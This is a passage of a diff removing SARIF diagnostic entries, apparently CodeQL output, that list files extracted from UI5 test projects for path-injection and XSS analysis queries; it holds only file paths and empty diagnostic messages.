"" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ 
{ - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - 
"text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : 
"" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - 
} - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ 
{ - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
